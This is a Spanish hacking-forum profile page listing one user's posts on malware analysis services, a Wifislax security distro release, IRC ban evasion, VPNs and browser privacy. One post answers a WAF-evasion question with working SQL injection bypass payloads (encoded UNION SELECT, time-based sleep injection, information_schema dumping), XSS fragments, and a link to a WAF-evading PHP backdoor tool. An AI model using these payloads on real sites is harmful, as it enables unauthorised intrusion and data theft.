Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - el-brujo

#831
Cita de: Machacador en 22 Enero 2021, 12:08 PM
Abre tu propio post solicitando lo que necesitas...

:rolleyes: :o :rolleyes:



No, mejor no. O será borrado.

Después de revivir un mensaje de 2019...... y hacer ése tipo de pregunta, tiene todos los números de acabar en la papelera.
#832
pues no me dedico a analizar muestras de malware, pero si conozco algunas de las herramientas que existen (que no son precisamente pocas).

La verdad es que en los últimos años han aparecido un montón de servicios online muy, muy completos.



Lo que yo haría es tomar ideas de otros servicios y proyectos (siempre que sea factible, claro está).

Recopilación herramientas y servicios on-line:
https://blog.elhacker.net/2015/06/servicios-automatizados-de-analisis-de-malware-online-cloud-nube.html

(Cloud Malware Analysis Services)

    Anubis : http://anubis.iseclab.org

    Any Run : https://any.run

    Malwr : Basado en Cuckoo Sandbox https://malwr.com/submission

    Threat Expert : http://www.threatexpert.com/submit.aspx

    Camas Comodo: http://camas.comodo.com/

    Threat Track : http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx

    Vicheck : https://www.vicheck.ca

    VirusTotal: https://www.virustotal.com/

    VxStream: https://www.hybrid-analysis.com/
#833
Se sigue utilizando como base slackware64-14.2 , con todos sus parches de seguridad al día.
Esta iso es un punto de control para la versión estable , se han actualizado todos los paquetes base , como firmwares , kernel ... navegador etc.

Como kernel sale con linux-5.4.91 LTS
Como navegador , trae el recien estrenado chrome 88 , que ademas de muchos parches de seguridad , han eliminado finalmente el soporte de flash player.



Seguramente sera la ultima versión de wifislax con kde4 y slackware64-14.2

Changelog

Citar20/01/2021
01 - Actualizado kernel 5.4.89 --> 5.4.91
02 - Actualizados firmwares de sistema
03 - Actualizado chrome-85.0.4183.121 --> 88.0.4324.96
04 - Actualizado bettercap-2.28 --> 2.29
05 - Actualizado airgeddon-10.31 --> 10.40

12/01/2021
01 - Actualizado kernel 5.4.88 --> 5.4.89
02 - Actualizado wpscan-3.8.12 --> 3.8.13
03 - Modificado hostapd-2.9 con mas opciones.

06/01/2021
01 - Actualizado kernel 5.4.87 --> 5.4.88
02 - Actualizados firmwares de sistema
03 - Mejorado wallpaper island por conca
    Se veían imperfecciones en la parte baja
    si usábamos un monitor grande.

Descarga
https://ns2.elhacker.net/isos/wifislax64-2.4-final.iso

Fuente:
https://foro.seguridadwireless.net/live-wifislax/wifislax64-2-4-final-para-descarga
#834
Lo que hay sobretodo son técnicas de ocultación, en este caso para hacerlo FUD (indetectable al antivirus), sea el lenguaje que sea.

Un ejemplo de RAT multiplataforma bastante curioso.

Arbitrium-RAT: troyano de acceso remoto multiplataforma (Windows-Android-Linux)
https://blog.elhacker.net/2021/01/arbitrium-rat-troyano-de-acceso-remoto-multiplataforma-windows-android..html
#835
Mensajería / Re: saltarse baneos en irc
21 Enero 2021, 20:32 PM
hoy en día con la cantidad de vpn's que hay disponibles es todavía más fácil saltarse un baneo. Seguro que hay bnc (bouncers)  y demás.

[D]aniel  te lo ha explicado muy bien, depende del formato del ban, si es por nick o ip

Citar0: *!user@host.domain
    1: *!*user@host.domain
    2: *!*@host.domain
    3: *!*user@*.domain
    4: *!*@*.domain
    5: nick!user@host.domain
    6: nick!*user@host.domain
    7: nick!*@host.domain
    8: nick!*user@*.domain
    9: nick!*@*.domain

¿Todavía se usa IRC? Pensaba que todos se mudaron a Discord  :laugh:
#836
Dudas Generales / Re: Google Forms
21 Enero 2021, 20:23 PM
Google Forms genera automáticamente si lo deseas un una hoja de cálculo tipo "excel" y también un reporte en HTML con gráficos en forma de quesitos. Puedes guardar esa página en HTML directamente desde el navegador, exportar en PDF.

También puedes exportar loa hoja de cálculo separada por ; , etc
#837
Nivel Web / Re: Evasión de WAF.
20 Enero 2021, 00:43 AM
En github y medium he visto un montón de "trucos" técnicas y ejemplos para hacer un bypass de WAF. También hay varios bypass para el WAF de CloudFLare por ejemplo. Sería muy interesante primero averiguar el WAF que están utilizando. En las cabeceras de las peticiones web suelen añadir el WAF xD

Mejor manual que usar un "tamper". Puedes usar mayúsculas-minúsculas (dudo que funciona jaja) pero codificación URL + comentarios si

WAF Bypassing Strings usando comentarios, Url Encode (encoding)
Illegal mix of Collations ByPass Method

'XOR(if(now()=sysdate(),sleep(5*5),0))OR'


Aquí tienes ejemplos:

Citar+union+select+1,2...+--+-
✖️
+/*!50000union*/+/*!50000select*/+1,2...+--+-
✖️

+/*!50000union%23%0Aselect*/+1,2...+--+-
✔️
+/*!50000uNiOn*/(/*!50000SeLeCt*/+11,22,33....)+--+-

Union select 1,2,3,4,...--
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4... --


✔️

/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4,5--

%75%6e%69on = union
%73%65%6cect = select

%75%6e%69 = uni = url encode
%73%65%6c = sel = url encode


Citar1,group_concat(table_name) /*%%!asd%%%%*/from /*%%!asd%%%%*/information_schema.tables where table_schema=database(/*%%!asd%%%%*/) --+

Ejemplos:
https://github.com/Y000o/Payloads_xss_sql_bypass/blob/master/Payloads_xss_sql_bypass.md#sql-injection
https://medium.com/bugbountywriteup/exploiting-error-based-sql-injections-bypassing-restrictions-ed099623cd94
https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/

Lo mismo para evadir (bypass) de XSS

    1st Injection: */</script><!--
    2nd Injection: */.domain)/*xxx
    3rd Injection:*/(document/*xx
    4th Injection: */prompt/*xxxxx
    5th Injection: "><script>/*xss

https://twitter.com/XssPayloads



O sé imaginativo: Por ejemplo usa Bantam, Una herramienta de generación y administración de puerta trasera de PHP con transmisión de carga útil cifrada de extremo a extremo diseñada para evitar los sistemas WAF, IDS, SIEM

https://github.com/gellin/bantam

#838
Cita de: simorg en 15 Enero 2021, 23:28 PM
Con ojo a lo que compramos a los chinos.....en una pagina archiconocida compre hace muy poco un HDD de 2,5 de 1 Tb y lo que me han enviado es uno de ......300 Gb.

Y ahora reclama...jaja

Saludos.

Justo me ha recordado a esto:



Comprobar la capacidad real de espacio en un pendrive
https://blog.elhacker.net/2021/01/comprobar-la-capacidad-real-de-un-pendrive-detectar-si-es-falso.html
#839
Citar¿sería recomendable que el portátil estuviera dentro de una red aislada en mi propia red interna? De ser así ¿Qué método sería el recomendado?
Por temas de seguridad y privacidad no me haría mucha ilusión que todo estuviera dentro de la misma red.

Si te conectas a la red del trabajo por una vpn suya, pues se supone que la red del trabajo es segura ¿no?

Si la red de tu trabajo no es segura, apaga y vámonos.

Dudo que en la red interna de tu trabajo haya gente haciendo pruebas de pentesting, aunque todo podría ser xD

Otro tema es que con algunas VPN's (la mayoría) también puedes navegar con la misma ip pública del trabajo y eso si no es recomendable xD

Configura el navegador de manera privada, activando TLS 1.3, ESNI, DoH y DoT, etc
https://blog.elhacker.net/2020/11/activar-medidas-privacidad-navegador-firefox-chrome-windows10-android-linux-esni-tls-dns-over-tls.html
#840
Dudas Generales / Re: ¿VPN Ecuador?
19 Enero 2021, 23:43 PM
lo ideal seria buscar VPN Ip Ecuador o proxy ecuador en Google, seguro que encuentras algo.

http://free-proxy.cz/es/proxylist/country/EC/all/ping/all

¿O algún nodo de Tor de Ecuador no te sirve?